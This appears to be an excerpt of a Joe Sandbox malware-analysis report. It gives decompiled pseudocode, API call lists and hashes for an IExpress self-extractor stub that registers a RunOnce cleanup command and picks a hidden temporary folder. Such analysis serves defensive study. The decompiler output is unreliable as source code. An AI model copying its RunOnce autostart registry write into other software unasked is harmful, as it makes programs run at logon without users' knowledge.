                                                                        • Opcode ID: dae1ced55becba8e13b6ee622af3e3aa7709d32da19aaf2b61572c28105cdcd1
                                                                        • Instruction ID: d06b3b73c0c6c0847991cea048146f7397a18d211874e00cbc045d104fde6eee
                                                                        • Opcode Fuzzy Hash: dae1ced55becba8e13b6ee622af3e3aa7709d32da19aaf2b61572c28105cdcd1
                                                                        • Instruction Fuzzy Hash: B390027425150447A6102B70DD1D4A576919B4D602F8154A1A111C4499DB6080407B17
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E00F8202A(struct HINSTANCE__* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v528;
                                                                        				void* _v532;
                                                                        				int _v536;
                                                                        				int _v540;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				long _t36;
                                                                        				long _t41;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				CHAR* _t54;
                                                                        				void _t56;
                                                                        				signed int _t66;
                                                                        				intOrPtr* _t72;
                                                                        				void* _t73;
                                                                        				void* _t75;
                                                                        				void* _t80;
                                                                        				intOrPtr* _t81;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        				void* _t90;
                                                                        				_Unknown_base(*)()* _t91;
                                                                        				signed int _t93;
                                                                        				void* _t94;
                                                                        				void* _t95;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_t28 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t28 ^ _t93;
                                                                        				_t84 = 0x104;
                                                                        				memset( &_v268, 0, 0x104);
                                                                        				memset( &_v528, 0, 0x104);
                                                                        				_t95 = _t94 + 0x18;
                                                                        				_t66 = 0;
                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                        				if(_t36 != 0) {
                                                                        					L24:
                                                                        					return E00F86CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                        				}
                                                                        				_push(_t86);
                                                                        				_t87 = 0;
                                                                        				while(1) {
                                                                        					E00F8171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                        					_t95 = _t95 + 0x10;
                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                        					if(_t41 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t87 = _t87 + 1;
                                                                        					if(_t87 < 0xc8) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				if(_t87 != 0xc8) {
                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                        					_t79 = _t84;
                                                                        					E00F8658A( &_v528, _t84, "advpack.dll");
                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                        					_t84 = _t46;
                                                                        					if(_t84 == 0) {
                                                                        						L10:
                                                                        						if(GetModuleFileNameA( *0xf89a3c,  &_v268, 0x104) == 0) {
                                                                        							L17:
                                                                        							_t36 = RegCloseKey(_v532);
                                                                        							L23:
                                                                        							_pop(_t86);
                                                                        							goto L24;
                                                                        						}
                                                                        						L11:
                                                                        						_t72 =  &_v268;
                                                                        						_t80 = _t72 + 1;
                                                                        						do {
                                                                        							_t49 =  *_t72;
                                                                        							_t72 = _t72 + 1;
                                                                        						} while (_t49 != 0);
                                                                        						_t73 = _t72 - _t80;
                                                                        						_t81 = 0xf891e4;
                                                                        						do {
                                                                        							_t50 =  *_t81;
                                                                        							_t81 = _t81 + 1;
                                                                        						} while (_t50 != 0);
                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xf891e5;
                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xf891e5);
                                                                        						if(_t90 != 0) {
                                                                        							 *0xf88580 = _t66 ^ 0x00000001;
                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                        							if(_t66 == 0) {
                                                                        								_t54 = "%s /D:%s";
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        							E00F8171E(_t90, _t84, _t54,  &_v268);
                                                                        							_t75 = _t90;
                                                                        							_t23 = _t75 + 1; // 0x1
                                                                        							_t79 = _t23;
                                                                        							do {
                                                                        								_t56 =  *_t75;
                                                                        								_t75 = _t75 + 1;
                                                                        							} while (_t56 != 0);
                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                        							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                        							RegCloseKey(_v532); // executed
                                                                        							_t36 = LocalFree(_t90);
                                                                        							goto L23;
                                                                        						}
                                                                        						_t79 = 0x4b5;
                                                                        						E00F844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                        					FreeLibrary(_t84); // executed
                                                                        					if(_t91 == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        						E00F8658A( &_v268, 0x104, 0xf81140);
                                                                        					}
                                                                        					goto L11;
                                                                        				}
                                                                        				_t36 = RegCloseKey(_v532);
                                                                        				 *0xf88530 = _t66;
                                                                        				goto L23;
                                                                        			}

































                                                                        0x00f8202a
                                                                        0x00f82035
                                                                        0x00f8203c
                                                                        0x00f82041
                                                                        0x00f82050
                                                                        0x00f8205f
                                                                        0x00f82064
                                                                        0x00f8206f
                                                                        0x00f8208c
                                                                        0x00f82094
                                                                        0x00f82257
                                                                        0x00f82266
                                                                        0x00f82266
                                                                        0x00f8209a
                                                                        0x00f8209b
                                                                        0x00f8209d
                                                                        0x00f820aa
                                                                        0x00f820af
                                                                        0x00f820c9
                                                                        0x00f820d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f820d3
                                                                        0x00f820da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f820da
                                                                        0x00f820e2
                                                                        0x00f82103
                                                                        0x00f8210e
                                                                        0x00f82116
                                                                        0x00f82122
                                                                        0x00f82128
                                                                        0x00f8212c
                                                                        0x00f82179
                                                                        0x00f82194
                                                                        0x00f821de
                                                                        0x00f821e4
                                                                        0x00f82256
                                                                        0x00f82256
                                                                        0x00000000
                                                                        0x00f82256
                                                                        0x00f82196
                                                                        0x00f82196
                                                                        0x00f8219c
                                                                        0x00f8219f
                                                                        0x00f8219f
                                                                        0x00f821a1
                                                                        0x00f821a2
                                                                        0x00f821a6
                                                                        0x00f821a8
                                                                        0x00f821b0
                                                                        0x00f821b0
                                                                        0x00f821b2
                                                                        0x00f821b3
                                                                        0x00f821bc
                                                                        0x00f821c7
                                                                        0x00f821cb
                                                                        0x00f821f1
                                                                        0x00f821f6
                                                                        0x00f821fd
                                                                        0x00f821ff
                                                                        0x00f821ff
                                                                        0x00f82204
                                                                        0x00f82213
                                                                        0x00f82218
                                                                        0x00f8221d
                                                                        0x00f8221d
                                                                        0x00f82220
                                                                        0x00f82220
                                                                        0x00f82222
                                                                        0x00f82223
                                                                        0x00f82229
                                                                        0x00f8223d
                                                                        0x00f82249
                                                                        0x00f82250
                                                                        0x00000000
                                                                        0x00f82250
                                                                        0x00f821d2
                                                                        0x00f821d9
                                                                        0x00000000
                                                                        0x00f821d9
                                                                        0x00f8213a
                                                                        0x00f82141
                                                                        0x00f82144
                                                                        0x00f8214c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82163
                                                                        0x00f82172
                                                                        0x00f82172
                                                                        0x00000000
                                                                        0x00f82163
                                                                        0x00f820ea
                                                                        0x00f820f0
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F82050
                                                                        • memset.MSVCRT ref: 00F8205F
                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00F8208C
                                                                          • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F820C9
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F820EA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F82103
                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82122
                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00F82134
                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82144
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F8215B
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F8218C
                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F821C1
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F821E4
                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00F8223D
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82249
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                        • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                        • API String ID: 178549006-1563176777
                                                                        • Opcode ID: fd6663e54b9b195fc5ccb77196dc5fc40fda38d6e7488c2591b08e70c146e0d3
                                                                        • Instruction ID: 6b316da6f59a7a3cf4263eab61548626dd7e162b3abf940f31fbbe296dc1fa0f
                                                                        • Opcode Fuzzy Hash: fd6663e54b9b195fc5ccb77196dc5fc40fda38d6e7488c2591b08e70c146e0d3
                                                                        • Instruction Fuzzy Hash: 1F511572A00218ABEB20BF60DC4DFFB777CEB40750F1401A9FA05E7151DA75AE45AB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 232 f855a0-f855d9 call f8468f LocalAlloc 235 f855db-f855f1 call f844b9 call f86285 232->235 236 f855fd-f8560c call f8468f 232->236 251 f855f6-f855f8 235->251 241 f8560e-f85630 call f844b9 LocalFree 236->241 242 f85632-f85643 lstrcmpA 236->242 241->251 245 f8564b-f85659 LocalFree 242->245 246 f85645 242->246 249 f8565b-f8565d 245->249 250 f85696-f8569c 245->250 246->245 255 f85669 249->255 256 f8565f-f85667 249->256 253 f8589f-f858b5 call f86517 250->253 254 f856a2-f856a8 250->254 252 f858b7-f858c7 call f86ce0 251->252 253->252 254->253 258 f856ae-f856c1 GetTempPathA 254->258 259 f8566b-f8567a call f85467 255->259 256->255 256->259 263 f856f3-f85711 call f81781 258->263 264 f856c3-f856c9 call f85467 258->264 271 f8589b-f8589d 259->271 272 f85680-f85691 call f844b9 259->272 274 f8586c-f85890 GetWindowsDirectoryA call f8597d 263->274 275 f85717-f85729 GetDriveTypeA 263->275 270 f856ce-f856d0 264->270 270->271 276 f856d6-f856df call f82630 270->276 271->252 272->251 274->263 288 f85896 274->288 278 f8572b-f8572e 275->278 279 f85730-f85740 GetFileAttributesA 275->279 276->263 289 f856e1-f856ed call f85467 276->289 278->279 282 f85742-f85745 278->282 279->282 283 f8577e-f8578f call f8597d 279->283 286 f8576b 282->286 287 f85747-f8574f 282->287 295 f85791-f8579e call f82630 283->295 296 f857b2-f857bf call f82630 283->296 291 f85771-f85779 286->291 287->291 292 f85751-f85753 287->292 288->271 289->263 289->271 298 f85864-f85866 291->298 292->291 297 f85755-f85762 call f86952 292->297 295->286 306 f857a0-f857b0 call f8597d 295->306 307 f857c1-f857cd GetWindowsDirectoryA 296->307 308 f857d3-f857f8 call f8658a GetFileAttributesA 296->308 297->286 309 f85764-f85769 297->309 298->274 298->275 306->286 306->296 307->308 314 f8580a 308->314 315 f857fa-f85808 CreateDirectoryA 308->315 309->283 309->286 316 f8580d-f8580f 314->316 315->316 317 f85811-f85825 316->317 318 f85827-f8585c SetFileAttributesA call f81781 call f85467 316->318 317->298 318->271 323 f8585e 318->323 323->298
                                                                        C-Code - Quality: 92%
                                                                        			E00F855A0(void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v265;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				int _t32;
                                                                        				int _t33;
                                                                        				int _t35;
                                                                        				signed int _t36;
                                                                        				signed int _t38;
                                                                        				int _t40;
                                                                        				int _t44;
                                                                        				long _t48;
                                                                        				int _t49;
                                                                        				int _t50;
                                                                        				signed int _t53;
                                                                        				int _t54;
                                                                        				int _t59;
                                                                        				char _t60;
                                                                        				int _t65;
                                                                        				char _t66;
                                                                        				int _t67;
                                                                        				int _t68;
                                                                        				int _t69;
                                                                        				int _t70;
                                                                        				int _t71;
                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                        				int _t73;
                                                                        				CHAR* _t82;
                                                                        				CHAR* _t88;
                                                                        				void* _t103;
                                                                        				signed int _t110;
                                                                        
                                                                        				_t28 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t28 ^ _t110;
                                                                        				_t2 = E00F8468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                        				if(_t109 != 0) {
                                                                        					_t82 = "RUNPROGRAM";
                                                                        					_t32 = E00F8468F(_t82, _t109, 1);
                                                                        					__eflags = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                        						__eflags = _t33;
                                                                        						if(_t33 == 0) {
                                                                        							 *0xf89a30 = 1;
                                                                        						}
                                                                        						LocalFree(_t109);
                                                                        						_t35 =  *0xf88b3e; // 0x0
                                                                        						__eflags = _t35;
                                                                        						if(_t35 == 0) {
                                                                        							__eflags =  *0xf88a24; // 0x0
                                                                        							if(__eflags != 0) {
                                                                        								L46:
                                                                        								_t101 = 0x7d2;
                                                                        								_t36 = E00F86517(_t82, 0x7d2, 0, E00F83210, 0, 0);
                                                                        								asm("sbb eax, eax");
                                                                        								_t38 =  ~( ~_t36);
                                                                        							} else {
                                                                        								__eflags =  *0xf89a30; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									goto L46;
                                                                        								} else {
                                                                        									_t109 = 0xf891e4;
                                                                        									_t40 = GetTempPathA(0x104, 0xf891e4);
                                                                        									__eflags = _t40;
                                                                        									if(_t40 == 0) {
                                                                        										L19:
                                                                        										_push(_t82);
                                                                        										E00F81781( &_v268, 0x104, _t82, "A:\\");
                                                                        										__eflags = _v268 - 0x5a;
                                                                        										if(_v268 <= 0x5a) {
                                                                        											do {
                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                        												__eflags = _t109 - 6;
                                                                        												if(_t109 == 6) {
                                                                        													L22:
                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                        													__eflags = _t48 - 0xffffffff;
                                                                        													if(_t48 != 0xffffffff) {
                                                                        														goto L30;
                                                                        													} else {
                                                                        														goto L23;
                                                                        													}
                                                                        												} else {
                                                                        													__eflags = _t109 - 3;
                                                                        													if(_t109 != 3) {
                                                                        														L23:
                                                                        														__eflags = _t109 - 2;
                                                                        														if(_t109 != 2) {
                                                                        															L28:
                                                                        															_t66 = _v268;
                                                                        															goto L29;
                                                                        														} else {
                                                                        															_t66 = _v268;
                                                                        															__eflags = _t66 - 0x41;
                                                                        															if(_t66 == 0x41) {
                                                                        																L29:
                                                                        																_t60 = _t66 + 1;
                                                                        																_v268 = _t60;
                                                                        																goto L42;
                                                                        															} else {
                                                                        																__eflags = _t66 - 0x42;
                                                                        																if(_t66 == 0x42) {
                                                                        																	goto L29;
                                                                        																} else {
                                                                        																	_t68 = E00F86952( &_v268);
                                                                        																	__eflags = _t68;
                                                                        																	if(_t68 == 0) {
                                                                        																		goto L28;
                                                                        																	} else {
                                                                        																		__eflags = _t68 - 0x19000;
                                                                        																		if(_t68 >= 0x19000) {
                                                                        																			L30:
                                                                        																			_push(0);
                                                                        																			_t103 = 3;
                                                                        																			_t49 = E00F8597D( &_v268, _t103, 1);
                                                                        																			__eflags = _t49;
                                                                        																			if(_t49 != 0) {
                                                                        																				L33:
                                                                        																				_t50 = E00F82630(0,  &_v268, 1);
                                                                        																				__eflags = _t50;
                                                                        																				if(_t50 != 0) {
                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                        																				}
                                                                        																				_t88 =  &_v268;
                                                                        																				E00F8658A(_t88, 0x104, "msdownld.tmp");
                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                        																				if(_t53 != 0xffffffff) {
                                                                        																					_t54 = _t53 & 0x00000010;
                                                                        																					__eflags = _t54;
                                                                        																				} else {
                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                        																				}
                                                                        																				__eflags = _t54;
                                                                        																				if(_t54 != 0) {
                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                        																					_push(_t88);
                                                                        																					_t109 = 0xf891e4;
                                                                        																					E00F81781(0xf891e4, 0x104, _t88,  &_v268);
                                                                        																					_t101 = 1;
                                                                        																					_t59 = E00F85467(0xf891e4, 1, 0);
                                                                        																					__eflags = _t59;
                                                                        																					if(_t59 != 0) {
                                                                        																						goto L45;
                                                                        																					} else {
                                                                        																						_t60 = _v268;
                                                                        																						goto L42;
                                                                        																					}
                                                                        																				} else {
                                                                        																					_t60 = _v268 + 1;
                                                                        																					_v265 = 0;
                                                                        																					_v268 = _t60;
                                                                        																					goto L42;
                                                                        																				}
                                                                        																			} else {
                                                                        																				_t65 = E00F82630(0,  &_v268, 1);
                                                                        																				__eflags = _t65;
                                                                        																				if(_t65 != 0) {
                                                                        																					goto L28;
                                                                        																				} else {
                                                                        																					_t67 = E00F8597D( &_v268, 1, 1, 0);
                                                                        																					__eflags = _t67;
                                                                        																					if(_t67 == 0) {
                                                                        																						goto L28;
                                                                        																					} else {
                                                                        																						goto L33;
                                                                        																					}
                                                                        																				}
                                                                        																			}
                                                                        																		} else {
                                                                        																			goto L28;
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														goto L22;
                                                                        													}
                                                                        												}
                                                                        												goto L47;
                                                                        												L42:
                                                                        												__eflags = _t60 - 0x5a;
                                                                        											} while (_t60 <= 0x5a);
                                                                        										}
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t101 = 1;
                                                                        										_t69 = E00F85467(0xf891e4, 1, 3); // executed
                                                                        										__eflags = _t69;
                                                                        										if(_t69 != 0) {
                                                                        											goto L45;
                                                                        										} else {
                                                                        											_t82 = 0xf891e4;
                                                                        											_t70 = E00F82630(0, 0xf891e4, 1);
                                                                        											__eflags = _t70;
                                                                        											if(_t70 != 0) {
                                                                        												goto L19;
                                                                        											} else {
                                                                        												_t101 = 1;
                                                                        												_t82 = 0xf891e4;
                                                                        												_t71 = E00F85467(0xf891e4, 1, 1);
                                                                        												__eflags = _t71;
                                                                        												if(_t71 != 0) {
                                                                        													goto L45;
                                                                        												} else {
                                                                        													do {
                                                                        														goto L19;
                                                                        														L43:
                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                        														_push(4);
                                                                        														_t101 = 3;
                                                                        														_t82 =  &_v268;
                                                                        														_t44 = E00F8597D(_t82, _t101, 1);
                                                                        														__eflags = _t44;
                                                                        													} while (_t44 != 0);
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t35 - 0x5c;
                                                                        							if(_t35 != 0x5c) {
                                                                        								L10:
                                                                        								_t72 = 1;
                                                                        							} else {
                                                                        								__eflags =  *0xf88b3f - _t35; // 0x0
                                                                        								_t72 = 0;
                                                                        								if(__eflags != 0) {
                                                                        									goto L10;
                                                                        								}
                                                                        							}
                                                                        							_t101 = 0;
                                                                        							_t73 = E00F85467(0xf88b3e, 0, _t72);
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								L45:
                                                                        								_t38 = 1;
                                                                        							} else {
                                                                        								_t101 = 0x4be;
                                                                        								E00F844B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t101 = 0x4b1;
                                                                        						E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						LocalFree(_t109);
                                                                        						 *0xf89124 = 0x80070714;
                                                                        						goto L2;
                                                                        					}
                                                                        				} else {
                                                                        					_t101 = 0x4b5;
                                                                        					E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					 *0xf89124 = E00F86285();
                                                                        					L2:
                                                                        					_t38 = 0;
                                                                        				}
                                                                        				L47:
                                                                        				return E00F86CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                        			}





































                                                                        0x00f855ab
                                                                        0x00f855b2
                                                                        0x00f855c9
                                                                        0x00f855d5
                                                                        0x00f855d9
                                                                        0x00f85600
                                                                        0x00f85605
                                                                        0x00f8560a
                                                                        0x00f8560c
                                                                        0x00f85638
                                                                        0x00f85641
                                                                        0x00f85643
                                                                        0x00f85645
                                                                        0x00f85645
                                                                        0x00f8564c
                                                                        0x00f85652
                                                                        0x00f85657
                                                                        0x00f85659
                                                                        0x00f85696
                                                                        0x00f8569c
                                                                        0x00f8589f
                                                                        0x00f858a7
                                                                        0x00f858ac
                                                                        0x00f858b3
                                                                        0x00f858b5
                                                                        0x00f856a2
                                                                        0x00f856a2
                                                                        0x00f856a8
                                                                        0x00000000
                                                                        0x00f856ae
                                                                        0x00f856ae
                                                                        0x00f856b9
                                                                        0x00f856bf
                                                                        0x00f856c1
                                                                        0x00f856f3
                                                                        0x00f856f3
                                                                        0x00f85705
                                                                        0x00f8570a
                                                                        0x00f85711
                                                                        0x00f85717
                                                                        0x00f85724
                                                                        0x00f85726
                                                                        0x00f85729
                                                                        0x00f85730
                                                                        0x00f85737
                                                                        0x00f8573d
                                                                        0x00f85740
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8572b
                                                                        0x00f8572b
                                                                        0x00f8572e
                                                                        0x00f85742
                                                                        0x00f85742
                                                                        0x00f85745
                                                                        0x00f8576b
                                                                        0x00f8576b
                                                                        0x00000000
                                                                        0x00f85747
                                                                        0x00f85747
                                                                        0x00f8574d
                                                                        0x00f8574f
                                                                        0x00f85771
                                                                        0x00f85771
                                                                        0x00f85773
                                                                        0x00000000
                                                                        0x00f85751
                                                                        0x00f85751
                                                                        0x00f85753
                                                                        0x00000000
                                                                        0x00f85755
                                                                        0x00f8575b
                                                                        0x00f85760
                                                                        0x00f85762
                                                                        0x00000000
                                                                        0x00f85764
                                                                        0x00f85764
                                                                        0x00f85769
                                                                        0x00f8577e
                                                                        0x00f8577e
                                                                        0x00f85781
                                                                        0x00f85788
                                                                        0x00f8578d
                                                                        0x00f8578f
                                                                        0x00f857b2
                                                                        0x00f857b8
                                                                        0x00f857bd
                                                                        0x00f857bf
                                                                        0x00f857cd
                                                                        0x00f857cd
                                                                        0x00f857dd
                                                                        0x00f857e3
                                                                        0x00f857ef
                                                                        0x00f857f5
                                                                        0x00f857f8
                                                                        0x00f8580a
                                                                        0x00f8580a
                                                                        0x00f857fa
                                                                        0x00f85802
                                                                        0x00f85802
                                                                        0x00f8580d
                                                                        0x00f8580f
                                                                        0x00f85830
                                                                        0x00f85836
                                                                        0x00f8583d
                                                                        0x00f8584b
                                                                        0x00f85851
                                                                        0x00f85855
                                                                        0x00f8585a
                                                                        0x00f8585c
                                                                        0x00000000
                                                                        0x00f8585e
                                                                        0x00f8585e
                                                                        0x00000000
                                                                        0x00f8585e
                                                                        0x00f85811
                                                                        0x00f85817
                                                                        0x00f85819
                                                                        0x00f8581f
                                                                        0x00000000
                                                                        0x00f8581f
                                                                        0x00f85791
                                                                        0x00f85797
                                                                        0x00f8579c
                                                                        0x00f8579e
                                                                        0x00000000
                                                                        0x00f857a0
                                                                        0x00f857a9
                                                                        0x00f857ae
                                                                        0x00f857b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f857b0
                                                                        0x00f8579e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85769
                                                                        0x00f85762
                                                                        0x00f85753
                                                                        0x00f8574f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8572e
                                                                        0x00000000
                                                                        0x00f85864
                                                                        0x00f85864
                                                                        0x00f85864
                                                                        0x00f85717
                                                                        0x00000000
                                                                        0x00f856c3
                                                                        0x00f856c5
                                                                        0x00f856c9
                                                                        0x00f856ce
                                                                        0x00f856d0
                                                                        0x00000000
                                                                        0x00f856d6
                                                                        0x00f856d6
                                                                        0x00f856d8
                                                                        0x00f856dd
                                                                        0x00f856df
                                                                        0x00000000
                                                                        0x00f856e1
                                                                        0x00f856e2
                                                                        0x00f856e4
                                                                        0x00f856e6
                                                                        0x00f856eb
                                                                        0x00f856ed
                                                                        0x00000000
                                                                        0x00f856f3
                                                                        0x00f856f3
                                                                        0x00000000
                                                                        0x00f8586c
                                                                        0x00f85878
                                                                        0x00f8587e
                                                                        0x00f85882
                                                                        0x00f85883
                                                                        0x00f85889
                                                                        0x00f8588e
                                                                        0x00f8588e
                                                                        0x00000000
                                                                        0x00f85896
                                                                        0x00f856ed
                                                                        0x00f856df
                                                                        0x00f856d0
                                                                        0x00f856c1
                                                                        0x00f856a8
                                                                        0x00f8565b
                                                                        0x00f8565b
                                                                        0x00f8565d
                                                                        0x00f85669
                                                                        0x00f85669
                                                                        0x00f8565f
                                                                        0x00f8565f
                                                                        0x00f85665
                                                                        0x00f85667
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85667
                                                                        0x00f8566c
                                                                        0x00f85673
                                                                        0x00f85678
                                                                        0x00f8567a
                                                                        0x00f8589b
                                                                        0x00f8589b
                                                                        0x00f85680
                                                                        0x00f85685
                                                                        0x00f8568c
                                                                        0x00000000
                                                                        0x00f8568c
                                                                        0x00f8567a
                                                                        0x00f8560e
                                                                        0x00f85613
                                                                        0x00f8561a
                                                                        0x00f85620
                                                                        0x00f85626
                                                                        0x00000000
                                                                        0x00f85626
                                                                        0x00f855db
                                                                        0x00f855e0
                                                                        0x00f855e7
                                                                        0x00f855f1
                                                                        0x00f855f6
                                                                        0x00f855f6
                                                                        0x00f855f6
                                                                        0x00f858b7
                                                                        0x00f858c7

                                                                        APIs
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00F855CF
                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00F85638
